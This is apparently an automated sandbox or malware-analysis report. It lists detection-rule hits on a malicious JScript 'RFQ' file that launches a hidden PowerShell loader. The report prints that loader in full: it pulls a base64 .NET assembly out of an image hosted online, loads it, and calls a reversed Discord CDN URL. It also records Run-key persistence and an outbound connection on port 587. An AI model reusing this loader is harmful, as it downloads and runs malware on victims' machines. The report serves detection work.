Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ?
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ?
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ?
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ?
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js", ProcessId: 652, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ?
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\padral.js, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1964, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js", ProcessId: 6784, ProcessName: cmd.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.230.212.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Initiated: true, ProcessId: 1632, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49707
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? 